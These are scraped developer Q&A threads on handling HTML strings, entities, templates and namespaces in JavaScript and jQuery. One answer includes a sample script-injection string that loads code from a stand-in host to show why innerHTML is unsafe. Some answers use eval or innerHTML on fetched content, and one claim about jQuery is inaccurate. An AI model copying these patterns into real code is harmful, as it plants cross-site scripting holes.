HTML entities in CSS content (convert entities to escape-string at runtime) - javascript

I know that html-entities like or ö or ð can not be used inside a css like this:
div.test:before {
content:"text with html-entities like ` ` or `ö` or `ð`";
}
There is a good question with good answers dealing with this problem: Adding HTML entities using CSS content
But I am reading the strings that are put into the css-content from a server via AJAX. The JavaScript running at the users client receives text with embedded html-entities and creates style-content from it instead of putting it as a text-element into an html-element's content. This method helps against thieves who try to steal my content via copy&paste. Text that is not part of the html-document (but part of css-content) is really hard to copy. This method works fine. There is only this nasty problem with that html-entities.
So I need to convert html-entities into unicode escape-sequences at runtime. I can do this either on the server with a perl-script or on the client with JavaScript, But I don't want to write a subroutine that contains a complete list of all existing named entities. There are more than 2200 named entities in html5, as listed here: http://www.w3.org/TR/2011/WD-html5-20110113/named-character-references.html And I don't want to change my subroutine every time this list gets changed. (Numeric entities are no problem.)
Is there any trick to perfom this conversion with javascript? Maybe by adding, reading and removing content to the DOM? (I am using jQuery)

I've found a solution:
var text = 'Text that contains html-entities';
var myDiv = document.createElement('div');
$(myDiv).html(text);
text = $(myDiv).text();
$('#id_of_a_style-element').html('#id_of_the_protected_div:before{content:"' + text + '"}');
Writing the Question was half way to get this answer. I hope this answer helps others too.

Related

Javascript creating an HTML object vs creating an HTML string

Pretty simple question that I couldn't find an answer to, maybe because it's a non-issue, but I'm wondering if there is a difference between creating an HTML object using Javascript or using a string to build an element. Like, is it a better practice to declare any HTML elements in JS as JS objects or as strings and let the browser/library/etc parse them? For example:
jQuery('<div />', {'class': 'example'});
vs
jQuery('<div class="example></div>');
(Just using jQuery as an example, but same question applies for vanilla JS as well.)
It seems like a non-issue to me but I'm no JS expert, and I want to make sure I'm doing it right. Thanks in advance!
They're both "correct". And both are useful at different times for different purposes.
For instance, in terms of page-speed, these days it's faster to just do something like:
document.body.innerHTML = "<header>....big string o' html text</footer>";
The browser will spit it out in an instant.
As a matter of safety, when dealing with user-input, it's safer to build elements, attach them to a documentFragment and then append them to the DOM (or replace a DOM node with your new version, or whatever).
Consider:
var userPost = "My name is Bob.<script src=\"//bad-place.com/awful-things.js\"></script>",
paragraph = "<p>" + userPost + "</p>";
commentList.innerHTML += paragraph;
Versus:
var userPost = "My name is Bob.<script src=\"//bad-place.com/awful-things.js\"></script>",
paragraph = document.createElement("p");
paragraph.appendChild( document.createTextNode(userPost) );
commentList.appendChild(paragraph);
One does bad things and one doesn't.
Of course, you don't have to create textNodes, you could use innerText or textContent or whatever (the browser will create the text node on its own).
But it's always important to consider what you're sharing and how.
If it's coming from anywhere other than a place you trust (which should be approximately nowhere, unless you're serving static pages, in which case, why are you building html?), then you should keep injection in mind -- only the things you WANT to be injected should be.
Either can be preferable depending on your particular scenario—ie, if everything is hard-coded, option 2 is probably better, as #camus said.
One limitation with the first option though, is that this
$("<div data-foo='X' />", { 'class': 'example' });
will not work. That overload expects a naked tag as the first parameter with no attributes at all.
This was reported here
1/ is better if your attribubes depends on variables set before calling the $ function , dont have to concatenate strings and variables. Aside from that fact ,since you can do both , and it's just some js code somebody else wrote , not a C++ DOM API hardcoded in the browser...

Techniques to avoid building HTML strings in JavaScript?

It is very often I come across a situation in which I want to modify, or even insert whole blocks of HTML into a page using JavaScript. Usually it also involves changing several parts of the HTML dynamically depending on certain parameters.
However, it can make for messy/unreadable code, and it just doesn't seem right to have these little snippets of HTML in my JavaScript code, dammit.
So, what are some of your techniques to avoid mixing HTML and JavaScript?
The Dojo toolkit has a quite useful system to deal with HTML fragments/templates. Let's say the HTML snippet mycode/mysnippet.tpl.html is something like the following
<div>
<span dojoAttachPoint="foo"></span>
</div>
Notice the dojoAttachPoint attribute. You can then make a widget mycode/mysnippet.js using the HTML snippet as its template:
dojo.declare("mycode.mysnippet", [dijit._Widget, dijit._Templated], {
templateString: dojo.cache("mycode", "mysnippet.tpl.html"),
construct: function(bar){
this.bar = bar;
},
buildRendering: function() {
this.inherited(arguments);
this.foo.innerHTML = this.bar;
}
});
The HTML elements given attach point attributes will become class members in the widget code. You can then use the templated widget like so:
new mycode.mysnippet("A cup of tea would restore my normality.").placeAt(someOtherDomElement);
A nice feature is that if you use dojo.cache and Dojo's build system, it will insert the HTML template text into the javascript code, so that the client doesn't have to make a separate request.
This may of course be way too bloated for your use case, but I find it quite useful - and since you asked for techniques, there's mine. Sitepoint has a nice article on it too.
There are many possible techniques. Perhaps the most obvious is to have all elements on the page but have them hidden - then your JS can simply unhide them/show them as required. This may not be possible though for certain situations. What if you need to add a number (unspecified) of duplicate elements (or groups of elements)? Then perhaps have the elements in question hidden and using something like jQuery's clone function insert them as required into the DOM.
Alternatively if you really have to build HTML on the fly then definitely make your own class to handle it so you don't have snippets scattered through your code. You could employ jQuery literal creators to help do this.
I'm not sure if it qualifies as a "technique", but I generally tend to avoid constructing blocks of HTML in JavaScript by simply loading the relevant blocks from the back-end via AJAX and using JavaScript to swap them in and out/place them as required. (i.e.: None of the low-level text shuffling is done in JavaScript - just the DOM manipulation.)
Whilst you of course need to allow for this during the design of the back-end architecture, I can't help but think to leads to a much cleaner set up.
Sometimes I utilise a custom method to return a node structure based on provided JSON argument(s), and add that return value to the DOM as required. It ain't accessible once JS is unavailable like some backend solutions could be.
After reading some of the responses I managed to come up with my own solution using Python/Django and jQuery.
I have the HTML snippet as a Django template:
<div class="marker_info">
<p> _info_ </p>
more info...
</div>
In the view, I use the Django method render_to_string to load the templates as strings stored in a dictionary:
snippets = { 'marker_info': render_to_string('templates/marker_info_snippet.html')}
The good part about this is I can still use the template tags, for example, the url function. I use simplejson to dump it as JSON and pass it into the full template. I still wanted to dynamically replace strings in the JavaScript code, so I wrote a function to replace words surrounded by underscores with my own variables:
function render_snippet(snippet, dict) {
for (var key in dict)
{
var regex = new RegExp('_' + key + '_', 'gi');
snippet = snippet.replace(regex, dict[key]);
}
return snippet;
}

JavaScript multiline strings and templating?

I have been wondering if there is a way to define multiline strings in JavaScript like you can do in languages like PHP:
var str = "here
goes
another
line";
Apparently this breaks up the parser. I found that placing a backslash \ in front of the line feed solves the problem:
var str = "here\
goes\
another\
line";
Or I could just close and reopen the string quotes again and again.
The reason why I am asking because I am making JavaScript based UI widgets that utilize HTML templates written in JavaScript. It is painful to type HTML in strings especially if you need to open and close quotes all the time. What would be a good way to define HTML templates within JavaScript?
I am considering using separate HTML files and a compilation system to make everything easier, but the library is distributed among other developers so that HTML templates have to be easy to include for the developers.
No thats basically what you have to do to do multiline strings.
But why define the templates in javascript anwyay? why not just put them into a file and have a ajax call load them up in a variable when you need them?
For instantce (using jquery)
$.get('/path/to/template.html', function(data) {
alert(data); //will alert the template code
});
#slebetman, Thanks for the detailed example.
Quick comment on the substitute_strings function.
I had to revise
str.replace(n,substitutions[n]);
to be
str = str.replace(n,substitutions[n]);
to get it to work. (jQuery version 1.5? - it is pure javascript though.)
Also when I had below situation in my template:
$CONTENT$ repeated twice $CONTENT$ like this
I had to do additional processing to get it to work.
str = str.replace(new RegExp(n, 'g'), substitutions[n]);
And I had to refrain from $ (regex special char) as the delimiter and used # instead.
Thought I would share my findings.
There are several templating systems in javascript. However, my personal favorite is one I developed myself using ajax to fetch XML templates. The templates are XML files which makes it easy to embed HTML cleanly and it looks something like this:
<title>This is optional</title>
<body><![CDATA[
HTML content goes here, the CDATA block prevents XML errors
when using non-xhtml html.
<div id="more">
$CONTENT$ may be substituted using replace() before being
inserted into $DOCUMENT$.
</div>
]]></body>
<script><![CDATA[
/* javascript code to be evaled after template
* is inserted into document. This is to get around
* the fact that this templating system does not
* have its own turing complete programming language.
* Here's an example use:
*/
if ($HIDE_MORE$) {
document.getElementById('more').display = 'none';
}
]]></script>
And the javascript code to process the template goes something like this:
function insertTemplate (url_to_template, insertion_point, substitutions) {
// Ajax call depends on the library you're using, this is my own style:
ajax(url_to_template, function (request) {
var xml = request.responseXML;
var title = xml.getElementsByTagName('title');
if (title) {
insertion_point.innerHTML += substitute_strings(title[0],substitutions);
}
var body = xml.getElementsByTagName('body');
if (body) {
insertion_point.innerHTML += substitute_strings(body[0],substitutions);
}
var script = xml.getElementsByTagName('script');
if (script) {
eval(substitute_strings(script[0],substitutions));
}
});
}
function substitute_strings (str, substitutions) {
for (var n in substitutions) {
str.replace(n,substitutions[n]);
}
return str;
}
The way to call the template would be:
insertTemplate('http://path.to.my.template', myDiv, {
'$CONTENT$' : "The template's content",
'$DOCUMENT$' : "the document",
'$HIDE_MORE$' : 0
});
The $ sign for substituted strings is merely a convention, you may use % of # or whatever delimiters you prefer. It's just there to make the part to be substituted unambiguous.
One big advantage to using substitutions on the javascript side instead of server side processing of the template is that this allows the template to be plain static files. The advantage of that (other than not having to write server side code) is that you can then set the caching policy for the template to be very aggressive so that the browser only needs to fetch the template the first time you load it. Subsequent use of the template would come from cache and would be very fast.
Also, this is a very simple example of the implementation to illustrate the mechanism. It's not what I'm using. You can modify this further to do things like multiple substitution, better handling of script block, handle multiple content blocks by using a for loop instead of just using the first element returned, properly handling HTML entities etc.
The reason I really like this is that the HTML is simply HTML in a plain text file. This avoids quoting hell and horrible string concatenation performance issues that you'll usually find if you directly embed HTML strings in javascript.
I think I found a solution I like.
I will store templates in files and fetch them using AJAX. This works for development stage only. For production stage, the developer has to run a compiler once that compiles all templates with the source files. It also compiles JavaScript and CSS to be more compact and it compiles them to a single file.
The biggest problem now is how to educate other developers doing that. I need to build it so that it is easy to do and understand why and what are they doing.
You could also use \n to generate newlines. The html would however be on a single line and difficult to edit. But if you generate the JS using PHP or something it might be an alternative

Easy way to drop XML Namespaces with JavaScript?

Is there an easy way, for example, to drop an XML name space, but keep the tag as is with jQuery or JavaScript? For example:
<html:a href="#an-example" title="Go to the example">Just an Example</html:a>
And change it to:
Just an Example
On the fly with jQuery or JavaScript and not knowing the elements and or attributes inside?
If there is no <script> tag in the code to be replaced you can try (demo):
container.innerHTML = container.innerHTML
.replace(/<(\/?)([^:>\s]*:)?([^>]+)>/g, "<$1$3>")
This isn't really an answer, but you'd be better off handling this server-side. JavaScript comes into the picture a bit too late for this kind of task... events may have already been attached to the existing nodes and you'd be processing each element twice.
What is the purpose of the namespace?
If these are static html files and the namespace serves no purpose I would strip all the namespaces with a regex.
If they're not static and the namespace has a purpose when served as xml, you could do some server-side detection to serve with the right doctype and the namespace (when appropriate).
It's easy when you know how ... just use \\ to escape the colon so it's not parsed as an action delimiter by the jquery parsing engine.
$('html\\:a').each( function(){
var temp = $(this).html();
$(this).replaceWith("<a>"+temp+"</a>");
});
This should iterate between each of those elements and replace them with normal tags. Since these are being served up to an ajax callback function, otherwise I don't see why you'd want to do it on the fly ... then the top line would change to:
$.post('...',{}, function(dat){
$(dat).find('html\\:a').each( blah blah ....
.
.
});
NB, i'm one of those terrible people who only really tests things in FF ...

Is it possible to get jquery objects from an html string thats not in the DOM?

For example in javascript code running on the page we have something like:
var data = '<html>\n <body>\n I want this text ...\n </body>\n</html>';
I'd like to use and at least know if its possible to get the text in the body of that html string without throwing the whole html string into the DOM and selecting from there.
First, it's a string:
var arbitrary = '<html><body>\nSomething<p>This</p>...</body></html>';
Now jQuery turns it into an unattached DOM fragment, applying its internal .clean() method to strip away things like the extra <html>, <body>, etc.
var $frag = $( arbitrary );
You can manipulate this with jQuery functions, even if it's still a fragment:
alert( $frag.filter('p').get() ); // says "<p>This</p>"
Or of course just get the text content as in your question:
alert( $frag.text() ); // includes "This" in my contrived example
// along with line breaks and other text, etc
You can also later attach the fragment to the DOM:
$('div#something_real').append( $frag );
Where possible, it's often a good strategy to do complicated manipulation on fragments while they're unattached, and then slip them into the "real" page when you're done.
The correct answer to this question, in this exact phrasing, is NO.
If you write something like var a = $("<div>test</div>"), jQuery will add that div to the DOM, and then construct a jQuery object around it.
If you want to do without bothering the DOM, you will have to parse it yourself. Regular expressions are your friend.
It would be easiest, I think, to put that into the DOM and get it from there, then remove it from the DOM again.
Jquery itself is full of tricks like this. It's adding all sorts off stuff into the DOM all the time, including when you build something using $('<p>some html</p>'). So if you went down that road you'd still effectively be placing stuff into the DOM then removing it again, temporarily, except that it'd be Jquery doing it.
John Resig (jQuery author) created a pure JS HTML parser that you might find useful. An example from that page:
var dom = HTMLtoDOM("<p>Data: <input disabled>");
dom.getElementsByTagName("body").length == 1
dom.getElementsByTagName("p").length == 1
Buuuut... This question contains a constraint that I think you need to be more critical of. Rather than working around a hard-coded HTML string in a JS variable, can you not reconsider why it's that way in the first place? WHAT is that hard-coded string used for?
If it's just sitting there in the script, re-write it as a proper object.
If it's the response from an AJAX call, there is a perfectly good jQuery AJAX API already there. (Added: although jQuery just returns it as a string without any ability to parse it, so I guess you're back to square one there.)
Before throwing it in the DOM that is just a plain string.
You can sure use REGEX.

Categories